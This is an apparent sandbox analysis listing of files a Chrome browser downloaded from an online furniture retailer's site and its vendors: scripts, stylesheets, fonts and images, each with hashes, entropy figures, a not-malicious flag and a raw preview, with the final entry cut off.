                                                                                                                                                          Preview:(()=>{var ne=Object.create;var mt=Object.defineProperty;var se=Object.getOwnPropertyDescriptor;var ce=Object.getOwnPropertyNames;var le=Object.getPrototypeOf,ue=Object.prototype.hasOwnProperty;var m=(t,e)=>()=>(t&&(e=t(t=0)),e);var fe=(t,e)=>()=>(e||t((e={exports:{}}).exports,e),e.exports);var de=(t,e,i,a)=>{if(e&&typeof e=="object"||typeof e=="function")for(let o of ce(e))!ue.call(t,o)&&o!==i&&mt(t,o,{get:()=>e[o],enumerable:!(a=se(e,o))||a.enumerable});return t};var pe=(t,e,i)=>(i=t!=null?ne(le(t)):{},de(e||!t||!t.__esModule?mt(i,"default",{value:t,enumerable:!0}):i,t));var r=(t,e,i)=>new Promise((a,o)=>{var s=f=>{try{c(i.next(f))}catch(d){o(d)}},n=f=>{try{c(i.throw(f))}catch(d){o(d)}},c=f=>f.done?a(f.value):Promise.resolve(f.value).then(s,n);c((i=i.apply(t,e)).next())});function ge(){_e(),ye(),Ee(),Oe()}function _e(){try{Object.prototype.entries||Object.defineProperty(Object.prototype,"entries",{configurable:!0,writable:!0,value(){return he(this)}})}catch(t){}}function he(t){return
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:gzip compressed data, from Unix, original size modulo 2^32 11816
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):4677
                                                                                                                                                          Entropy (8bit):7.946065353100574
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:E6AAE2410885DF2F2629465B60A2691D
                                                                                                                                                          SHA1:859D3D883FB8CA2AADEDF5753ABCD7ACCE922479
                                                                                                                                                          SHA-256:A113D210F17827A95D9D1EEE68BF4E0AA8BD39D67DF1D9420FF5E9C0F49B1D48
                                                                                                                                                          SHA-512:77CFA85A05295F3E1D239AE09D6EC80B7D038A0466276B7D5586E614035BABFAA7FAC4B965643EF18C38648ED68BACBFB510BCF06AC578BCFE2C11F7892544AD
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:http://amandotuvoz.org/favicon.ico
                                                                                                                                                          Preview:...........Rms......sg...J&av.......$...Nm.Rm.H.I...n..M...=._c.pw...~y...........3(\.........G...(z}.......[8....32qQt.....j.E..l0;.....h.Q....o.A....q...K......./^..z..P....P.`..1P.P...%J^Vy..g::<.s.}........k9=.v.].....I.v.s8w..>....;.]........N......p..3x.y......v...G......e...).e.,...v.&FV..I...Jq....M3H.......hp8(...a{.8jo..t..EI......6.....q^..>.Y.Z...Q.....H.].rBis_.4.:...Jar..!c...(.j...):....{{.d!5........D.h4..+....k5.y...U...D$w..Z.}Y....QO.,..5..I>.i6...<..]2X.pCM.....e^...Wh.2...|~..l'....|..v,.....sT.Wd....G.'.8R.....F......O.......E..>.......8....V..?\....~..[..K..J.z.....p...=4.LB)..Y....y..u.F......M.........Y.....b....;...C..d.5.[.&TW...Rd.{/_..l..y.o...Y'.+....G.;G.....\...?z..JL.9*..~"...P..,E....O.$.}..(..O.W...<...2X!.SS..Q..rx......O....x."..#.D.J...M...A.P.!3-.u.H.2..6....?.....<g...R.;1<.]..........9....G..$.Vp...0s.B.Q.=.f.%a..fQmB<.q..MZq..0&....V....k....I&;..A...}*m.D3.q..Icy+!Ef.}.~...`.i....../~].B......&.
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:Web Open Font Format (Version 2), TrueType, length 19252, version 1.0
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):19252
                                                                                                                                                          Entropy (8bit):7.990065631468077
                                                                                                                                                          Encrypted:true
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:3081AE959E35D7DFA394138443E9095E
                                                                                                                                                          SHA1:FE093FE9CA22A15354813C912484945A36B79146
                                                                                                                                                          SHA-256:DE60693F31597C2EC2C1BD972D15900B6BB7BE2BCC19DB7B71BD171469B7DBE0
                                                                                                                                                          SHA-512:82A9064BE73A985B3D30995EC49985EEEEC2223EAF624E2DC7DC57D4BA82D0B804B32DA11817C4268CA51D2B88689A9780D4B6130BA327E85F69F9E4109AAF6B
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://fonts.shopifycdn.com/helvetica/helvetica_n4.fe093fe9ca22a15354813c912484945a36b79146.woff2?h1=b3ZlcnN0b2NrLmNvbQ&hmac=b17005b8de9d58b8bf1d72e284cfa56571f24c5706b0774b2c810e4e87391ba4
                                                                                                                                                          Preview:wOF2......K4..........J..........................`..`..x..`..4.....(..I.6.$.....L.. .,. ..V.P.5x.*..Y..[.F!. ..(e.N...B..2,`...Z...*.....`-..k.....`....2|..PO..s.<fU2E$./gE~3.>.=.j@.GP..c...$.........H$..m@...[..6..9.U.....E.fw....."..Gh.\?~.;T$QgL.pI.$.....&..6H...tfv.0@-o.Q7..."...|0...^V.*.....f...FT.).H.t..-q..H.U...N..G..S?.....K........?(..eY..$.P:.......;.S...7<..". ............X.$.6m....n..E..-9~'k..L..W.........'z~...1K*!.T..&"......-.i..n.t.?..jD...J..WU........||......Hwa..MZ];UJ.....3,......%?....W.3..6.._H.C.......g.i.b..j4....L../....q$H}.N.O....Z...n....r.T.Ig.y/3.Q:...(.+.......m.}.'H .Kf..M.. ...<.z.!mPHr..v..............E.....;.FK..GK.!.h..IK'$B.P.T..pq+(.N...(9J..N!?/....`g........$. (QT...W...".....K.2.Y6.pgR....!.B.?.u!.......W...em.%f(.;.,.\QY{|.Vf...C`...4.{.............,.^R."...ES...p.K.Mv..D..F.......f..D.x.......{...e'.k......f...AZ~...........Px.O......4.6.O..2.rgu...8.....C..B.b........B*."
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (32117)
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):51984
                                                                                                                                                          Entropy (8bit):5.4192491243703405
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:DB49357F923EC899C9EF90B7DEF907B8
                                                                                                                                                          SHA1:480D28152D77EAB20F5992EC0AB5AF15960FFC91
                                                                                                                                                          SHA-256:80E528BE853EAC23AF2454534897CA9536B1D3D04AA043B042F34879A3C111C8
                                                                                                                                                          SHA-512:88607E0B9619FA59D47B036F0BDF571CD996701774BD7AAF075B63C38590FFD6315551CF361126D4F7E5379A6D635FE3C11283D9560419040254CD217BC544ED
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:!function(){var t=function(t){var e={exports:{}};return t.call(e.exports,e,e.exports),e.exports},e=function(t){return function(){var e=t.apply(this,arguments);return new Promise((function(t,r){function n(i,o){try{var a=e[i](o),s=a.value}catch(t){return void r(t)}if(!a.done)return Promise.resolve(s).then((function(t){n("next",t)}),(function(t){n("throw",t)}));t(s)}return n("next")}))}},r=function(t){return t&&t.__esModule?t:{default:t}},n=t((function(t){var e={}.toString;t.exports=function(t){return e.call(t).slice(8,-1)}})),i=t((function(t){var e=t.exports="undefined"!=typeof window&&window.Math==Math?window:"undefined"!=typeof self&&self.Math==Math?self:Function("return this")();"number"==typeof __g&&(__g=e)})),o=t((function(t){var e="__core-js_shared__",r=i[e]||(i[e]={});t.exports=function(t){return r[t]||(r[t]={})}})),a=t((function(t){var e=0,r=Math.random();t.exports=function(t){return"Symbol(".concat(void 0===t?"":t,")_",(++e+r).toString(36))}})),s=t((function(t){var e=o("wks"),r=
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JPEG image data, Exif standard: [TIFF image data, little-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], progressive, precision 8, 320x320, components 3
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):11168
                                                                                                                                                          Entropy (8bit):7.724245192752711
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:72C2187FB6C40A1C2CB4B3F49A9458F0
                                                                                                                                                          SHA1:728771DE94F29B3015599D29ED1F91777A793473
                                                                                                                                                          SHA-256:2F98505ECD0A8918377867137A8626BFA3D151563A0FB6611F75F18E72A7F752
                                                                                                                                                          SHA-512:E23B52858516A57056F8DC1A92DE194C02AB111AEDF42FDD0E7522BCC8D670AC1B1F4FF33B93451869BF861BB604F48CEE1BEDDABDC70A41BD2FC54E1BD3115B
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:......Exif..II*...........................V...........^...(.......................i.......f.......H.......H.................0210....................0100....................@...........@...........ICC_PROFILE.......lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$............C............................................) .. )/'%'/9339GDG]]}...C............................................) .. )/'%'/9339GDG]]}......@.@..................................................................................,........................................................................................................................................
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):41702
                                                                                                                                                          Entropy (8bit):7.987171878388761
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:2C9DC9DE5A1525D4317052D3620A2B9A
                                                                                                                                                          SHA1:AC7E737A76BB536AFD456C12F436CB4F8C483353
                                                                                                                                                          SHA-256:6951525AEF075C99CE35D77FFD0801357C6127A443A85266C5A10AAEE5455B34
                                                                                                                                                          SHA-512:890612B1E810D6F32D475D5918CF923006F7E04D51EE6D3CCB8C8F94300BCCC501C09E028EECA8D7A4A75F78DB69786522360322408EBF9455E5DF1603D1ADB3
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cdn/shop/files/SAFAVIEH-Horizon-Shag-Remona-2.6-inch-Thick-Rug_308da4ed-7bcd-4b9c-b65d-e06365270ccf.jpg?v=1715173337&width=320
                                                                                                                                                          Preview:RIFF...WEBPVP8X....(...?..?..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 N....u...*@.@.>5..B.!.~.B...R`.......|O......~.....}....o..-.s..W.7./......a=H.....G...g.O...z.._....z..Z.y...7.K.'.......^....x>.?.................G....|............?......g..J.....'.........K........*=#.o......?....;.....?......=.....O..g..._.>.~.}/.../.?.?.|+.......~............?................g......./...q.........W.o./......1......._..................?.....~..l....t."'..B.7.eR.?..2.....p. ....A...Di}........J.....V.a..n'...oA>..,^..GG.=.%.-......g9..ub.\..%.&.Z.M.l..$...C....8S>.;b2..#.a`C......O..0Mo6..
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (1758)
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):1759
                                                                                                                                                          Entropy (8bit):5.319097963764691
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:15F94C63AC240451A21402457105DAC1
                                                                                                                                                          SHA1:7BB19111F88BA56DD39663628F32AA1667729015
                                                                                                                                                          SHA-256:BAD297E320810F542EDD093BA63C19609B9993647EDB5E22DEE19CA57265A104
                                                                                                                                                          SHA-512:79525DF78A2959949E39E7E91E63FAA3B49A22EFE6697F6FBA10EA5449EC7C8625884F171D415053D20984598889C3B3EE0073C07B5A0A84132C03B07E34A213
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/wpm/strict/app/web-pixel-401408159@15f94c63ac240451a21402457105dac1.js
                                                                                                                                                          Preview:(()=>{var x=Object.create;var I=Object.defineProperty;var R=Object.getOwnPropertyDescriptor;var S=Object.getOwnPropertyNames;var y=Object.getPrototypeOf,C=Object.prototype.hasOwnProperty;var l=(e,t)=>()=>(e&&(t=e(e=0)),t);var A=(e,t)=>()=>(t||e((t={exports:{}}).exports,t),t.exports);var w=(e,t,o,i)=>{if(t&&typeof t=="object"||typeof t=="function")for(let n of S(t))!C.call(e,n)&&n!==o&&I(e,n,{get:()=>t[n],enumerable:!(i=R(t,n))||i.enumerable});return e};var L=(e,t,o)=>(o=e!=null?x(y(e)):{},w(t||!e||!e.__esModule?I(o,"default",{value:e,enumerable:!0}):o,e));var m=(e,t,o)=>new Promise((i,n)=>{var s=c=>{try{r(o.next(c))}catch(f){n(f)}},a=c=>{try{r(o.throw(c))}catch(f){n(f)}},r=c=>c.done?i(c.value):Promise.resolve(c.value).then(s,a);r((o=o.apply(e,t)).next())});var g,k=l(()=>{g="WebPixel::Render"});var E,d=l(()=>{k();E=e=>shopify.extend(g,e)});var _=l(()=>{d()});var O=l(()=>{_()});var N=A(h=>{"use strict";O();var P=/(clickref)=([0-9A-Za-z]+)/,p="_pz_clickref",b=5e3,T=e=>m(h,null,function*()
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):39476
                                                                                                                                                          Entropy (8bit):7.9851839646755645
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:CEE9951FB241E99CEA0494EAD538D07D
                                                                                                                                                          SHA1:E9E1AC175C908D512569BF667AA9C500E53F5402
                                                                                                                                                          SHA-256:32532427CCDAB4B18AFC50ABF4DA5CD11D4647116A27584AC65C46E3119F0EDD
                                                                                                                                                          SHA-512:A74F598A65B8794FC7F82ADEBD4561483126E4A22406F2CB7C2FA249892D24EEA21C9E33A80D2BD73F55DBE31F3DCF81FB13FCB2D1EBACD4BF6C37CDFF582F79
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cdn/shop/files/SAFAVIEH-Moroccan-Tassel-Shag-Delores-2-inch-Thick-Rug_6c59b675-a409-4d8e-bcb9-b3fef8f66b6b.jpg?v=1715176289&width=320
                                                                                                                                                          Preview:RIFF,...WEBPVP8X....(...?..?..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 .....Q...*@.@.>5..B.!.=.(...X..@.....`.L.......*~.O.:h....[.....W._...........'.._W_..................O`.._.?.z.{..z........./Zo.........~..U.......m...?....%.......o.?5.........}......_..../....._._.?v>>.w.'.o._....{..............v...W.G...}..O..............?....../._....................>f.w...3....o>........K.....7.?............o...~A...k.......G...?..................R._.G/.._....n....>....Y.C.#..........E.Z#U.b......G..x'.Kp5P..8.u9..y.vp...l...S.T.....!......5...Zu2..O..W......N...*/...fMF.v.Y.d..7-^L=...lQ..
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (26878)
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):362345
                                                                                                                                                          Entropy (8bit):5.565776703931635
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:255F3D92EBCB1CAB31B4BDCE54D1238C
                                                                                                                                                          SHA1:A52B76FD278D59E17F6E33CA41732F7703836D9D
                                                                                                                                                          SHA-256:8CE6630E6BD7640C5A2EA757EF2487A926C1FE4099A44CBBD6635FB168758FA6
                                                                                                                                                          SHA-512:2EC91FFBBD9729F89ED9018F95EE9C2C5FB131F53BB45F647B6474BCC0E3F586FEFF13F911EBA1FF85BD10DED0C1312064295AD090BF14F78E2735EEC7DD89F0
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:.// Copyright 2012 Google Inc. All rights reserved.. . (function(w,g){w[g]=w[g]||{};. w[g].e=function(s){return eval(s);};})(window,'google_tag_manager');. .(function(){..var data = {."resource": {. "version":"526",. . "macros":[{"function":"__e"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"transaction_id"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"address.country"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"address.city"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"address.address1"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"lastName"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"phone"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue":false,"vtp_name":"address.state"},{"function":"__v","vtp_dataLayerVersion":2,"vtp_setDefaultValue"
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:SVG Scalable Vector Graphics image
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):1610
                                                                                                                                                          Entropy (8bit):4.511513249076438
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:FBDE3F8CEEC0EA77C591897D9E3B75CE
                                                                                                                                                          SHA1:A3F68851F05B290E6783D27FA226B85EB5FE9DD3
                                                                                                                                                          SHA-256:CA55C33D7A9415A6FDAB6C0D883F5B7A16A82A33F987C6C09675F685125917F9
                                                                                                                                                          SHA-512:AA38884D40DB633397A53DD91895F2DBB4ACD85C3A6053E292541D51642C83C4258FC4ACC06ECBE2B03A09A3047C2950EC28E8B9083E4BEE7174D53435ACE215
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:<svg width="14" height="14" viewBox="0 0 14 14" fill="none" xmlns="http://www.w3.org/2000/svg">.<g clip-path="url(#clip0_393_915)">.<path d="M5.4365 4.77644L7 0.965174L8.5635 4.77644C8.66194 5.01641 8.88513 5.19598 9.159 5.22265L13.1482 5.61105L10.1207 8.40306C9.92635 8.58228 9.84785 8.84948 9.90151 9.0994L10.7802 13.192L7.37658 11.0705C7.1456 10.9265 6.8544 10.9265 6.62342 11.0705L3.21981 13.192L4.09849 9.09941C4.15215 8.84948 4.07365 8.58228 3.87932 8.40306L0.851766 5.61105L4.84099 5.22265C5.11487 5.19598 5.33806 5.01641 5.4365 4.77644Z" stroke="#252525"/>.<path d="M5.4365 4.77644L7 0.965174L8.5635 4.77644C8.66194 5.01641 8.88513 5.19598 9.159 5.22265L13.1482 5.61105L10.1207 8.40306C9.92635 8.58228 9.84785 8.84948 9.90151 9.0994L10.7802 13.192L7.37658 11.0705C7.1456 10.9265 6.8544 10.9265 6.62342 11.0705L3.21981 13.192L4.09849 9.09941C4.15215 8.84948 4.07365 8.58228 3.87932 8.40306L0.851766 5.61105L4.84099 5.22265C5.11487 5.19598 5.33806 5.01641 5.4365 4.77644Z" stroke="#252525"/>.<p
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:Unicode text, UTF-8 text, with very long lines (27068)
                                                                                                                                                          Category:dropped
                                                                                                                                                          Size (bytes):46520
                                                                                                                                                          Entropy (8bit):5.342606603321526
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:279F66B5BC2167F4D93BD0ECF1A8E894
                                                                                                                                                          SHA1:0CB86EBD91440FA12CE53EBF14566AF5390CB0BB
                                                                                                                                                          SHA-256:A0E952ABDDCB7C81AE6F848B6216A10757D84DAD5832B7362FA08DCD4644C9F6
                                                                                                                                                          SHA-512:BAB0920CAB0D478A3376F3F965C89C8A650E950083FFA7ADF8BAEE1D36BD0D0ADF43DABF4785E9D96E66587BBAAECE4713202FF3AE1D5D8A08568E0925FC6CC0
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          Preview:!function(){var Sizzle=(function(e){var t,n,r,i,o,u,l,a,c,s,f,d,p,h,g,m,y,w,v,b="sizzle"+1*new Date,N=e.document,x=0,C=0,E=oe(),D=oe(),A=oe(),T=function(e,t){return e===t&&(f=!0),0},S={}.hasOwnProperty,L=[],I=L.pop,q=L.push,B=L.push,R=L.slice,$=function(e,t){for(var n=0,r=e.length;n<r;n++)if(e[n]===t)return n;return-1},k="checked|selected|async|autofocus|autoplay|controls|defer|disabled|hidden|ismap|loop|multiple|open|readonly|required|scoped",P="[\\x20\\t\\r\\n\\f]",H="(?:\\\\.|[\\w-]|[^\0-\\xa0])+",M="\\["+P+"*("+H+")(?:"+P+"*([*^$|!~]?=)"+P+"*(?:'((?:\\\\.|[^\\\\'])*)'|\"((?:\\\\.|[^\\\\\"])*)\"|("+H+"))|)"+P+"*\\]",F=":("+H+")(?:\\((('((?:\\\\.|[^\\\\'])*)'|\"((?:\\\\.|[^\\\\\"])*)\")|((?:\\\\.|[^\\\\()[\\]]|"+M+")*)|.*)\\)|)",O=new RegExp(P+"+","g"),j=new RegExp("^"+P+"+|((?:^|[^\\\\])(?:\\\\.)*)"+P+"+$","g"),z=new RegExp("^"+P+"*,"+P+"*"),G=new RegExp("^"+P+"*([>+~]|"+P+")"+P+"*"),U=new RegExp("="+P+"*([^\\]'\"]*?)"+P+"*\\]","g"),V=new RegExp(F),X=new RegExp("^"+H+"$"),J={ID:new
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):15518
                                                                                                                                                          Entropy (8bit):7.94410239026525
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:13E92037A66DE942173449E054BDDF40
                                                                                                                                                          SHA1:751F8ECFCED16AAD046D165155BCF6A001A38916
                                                                                                                                                          SHA-256:F413024D8A2AD10C6909D6B22A3299F4615502374FE6469145553AEBDE72CEE4
                                                                                                                                                          SHA-512:3DDFD0FB6FF9C612F493ED60DD469E3D3A45A1CC2D65D09AE0764A8A7A31FC5BF582BF011CAEAEA7F789D031DFC645557B809B412FE6E57EE434C3A7D47F178D
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cdn/shop/files/Somette-Monterey-Butternut-Futon-Frame-and-Mattress_ecfd3d81-0397-46e4-b743-efe56b3f7e41.jpg?v=1715319534&width=320
                                                                                                                                                          Preview:RIFF.<..WEBPVP8X....(...?..?..ICCP........lcms....mntrRGB XYZ .........).9acspAPPL...................................-lcms................................................desc......._cprt...L....wtpt...X....rXYZ...l....gXYZ........bXYZ........rTRC.......@gTRC.......@bTRC.......@desc........c2ci............curv...............c...k...?.Q.4!.).2.;.F.Qw].kpz....|.i.}...0..text....CC0.XYZ ...............-XYZ ......o...8.....XYZ ......b.........XYZ ......$.........VP8 .:..p....*@.@.>9..C.!."(R..@..en.o..l.Q.3......5o.....S..3.t....w....??....................r=......%...+.g.......=.?l}h..{:.u...........G....T...?.=..{.o...?......./.}../.......;.7o....E=....O.~.?w.'....{.~......:.7..`....`=..........................[m.,..1.D..&..-...~...My.E{..o.>......@..O........e..\.?d.E....0..+.`.{..o....fX....m.........3Q6..S..#..K.SJ.V.iA....}...6Fo.d.*fhS..L.y.{$_..zB.R....T....(,.+...h...@]9..K/q......Rr(.;.3LF...........if...i.{.wcW...L.^-.2..?...+.0W.<....t..q..~..X......Pz.......J0
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:JSON data
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):147
                                                                                                                                                          Entropy (8bit):4.69746445700703
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:73C8A8857E955CD5C048C50A3E11E4F7
                                                                                                                                                          SHA1:38ED2578C023D017559984FAC43B23226549AF29
                                                                                                                                                          SHA-256:14C30B6108A58795F8C4B8C775DBBE006D6FFDC4C1C9ECB94E5EC7B363F54EBF
                                                                                                                                                          SHA-512:B55BA7FA8A058E243DC37D1E793806F0A3CF2A09EB135D40B4D86D53B4449E80F7A57DCA41A2096F59F3FF80E9192FC8ECF266D3DE74930EC88CA053DF5C8AF7
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://display.powerreviews.com/m/1280018588/l/en_US/product/21258012/snippet?apikey=0ce15d13-67ca-47dd-8c72-1d5e4694ada3&_noconfig=true
                                                                                                                                                          Preview:{"name":"snippet","results":[{"page_id":"21258012","rollup":{"average_rating":4.61,"rating_count":590,"review_count":590,"answered_questions":0}}]}
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (330)
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):25135
                                                                                                                                                          Entropy (8bit):4.706047497502984
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:5DFEA97A69D86F8D0AC11F1E442B42AE
                                                                                                                                                          SHA1:B0B7C8E751751F480D9D1B9C09D36138E14F7B1D
                                                                                                                                                          SHA-256:C70080425C7F3115D6F686BBF73A336D1DD283479C0357CFB14F7DBCEF374D15
                                                                                                                                                          SHA-512:357589765F913BCF77E0F7E60A073CDDB05ECCB6AFE355A46DA28412C8F13DC0E8B574EEF631CFC5A63EA93DD3D967FAFD1F25F4AD440E24EF9374DE2D074610
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://unpkg.com/tapcart-capture-kit@0.3.0/dist/embed.js
                                                                                                                                                          Preview:function noop() {.}.function assign(tar, src) {. for (const k in src). tar[k] = src[k];. return tar;.}.function is_promise(value) {. return value && typeof value === "object" && typeof value.then === "function";.}.function run(fn) {. return fn();.}.function blank_object() {. return /* @__PURE__ */ Object.create(null);.}.function run_all(fns) {. fns.forEach(run);.}.function is_function(thing) {. return typeof thing === "function";.}.function safe_not_equal(a, b) {. return a != a ? b == b : a !== b || (a && typeof a === "object" || typeof a === "function");.}.function is_empty(obj) {. return Object.keys(obj).length === 0;.}.function null_to_empty(value) {. return value == null ? "" : value;.}.let is_hydrating = false;.function start_hydrating() {. is_hydrating = true;.}.function end_hydrating() {. is_hydrating = false;.}.function upper_bound(low, high, key, value) {. while (low < high) {. const mid = low + (high - low >> 1);. if (key(mid) <= value) {. low = mid
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:ASCII text, with very long lines (3148)
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):3253
                                                                                                                                                          Entropy (8bit):4.968101627658684
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:69321C3CDC73F7A2E79F05DD39E8F31E
                                                                                                                                                          SHA1:1E25DF81D826E798B867CCA22B6E9F5C393C810A
                                                                                                                                                          SHA-256:FE49A01F1AA2BE795F9C71B5BE160FDE45655D9AB7FE78859CDE078BC84D68C6
                                                                                                                                                          SHA-512:901C27F32526D41E0D4B1807D5671C5CF2930378B10B1369131975A79E8655EB5C860C87B7AC4DFAB5F388FF07680DAE6BA95F3E4BC149812B68DB74F5798C98
                                                                                                                                                          Malicious:false
                                                                                                                                                          Reputation:unknown
                                                                                                                                                          URL:https://www.overstock.com/cdn/shop/t/211/assets/component-pills.css?v=175203172855090728401729142870
                                                                                                                                                          Preview:.angle{display:inline-block;pointer-events:none;-webkit-user-select:none;user-select:none;width:1em;height:1em;vertical-align:middle;line-height:0}.angle-icon{width:100%;height:100%;position:relative;display:inline-block;transition:transform .25s ease}.angle-icon:before,.angle-icon:after{content:"";width:50%;height:.1em;top:50%;position:absolute;background-color:currentColor;display:inline-block;border-radius:2px}.angle-icon:before{left:.1em;transform:rotate(45deg)}.angle-icon:after{right:.1em;transform:rotate(-45deg)}.angle-up .angle-icon{transform:rotate(180deg)}.angle-left .angle-icon{transform:rotate(90deg)}.angle-right .angle-icon{transform:rotate(-90deg)}.pill-nav{display:flex;align-items:center;padding-left:1px;--color-border: 218, 220, 223;--color-box-shadow: 218,220,223;--color-background: 255, 255, 255;--color-foreground-alt: 90,90,90}.setting-buttons-outline .pill-nav{grid-column-gap:.1rem}.pill-nav-item{flex:none;display:inline-flex;justify-content:center;align-items:center
                                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                          File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                          Category:downloaded
                                                                                                                                                          Size (bytes):48724
                                                                                                                                                          Entropy (8bit):7.989131618826245
                                                                                                                                                          Encrypted:false
                                                                                                                                                          SSDEEP:
                                                                                                                                                          MD5:63E19D1ED2870F6383B583AE4E02E835
                                                                                                                                                          SHA1:BAF0BC5D2D8DEE625639A35D6EF23AB973A2A11C
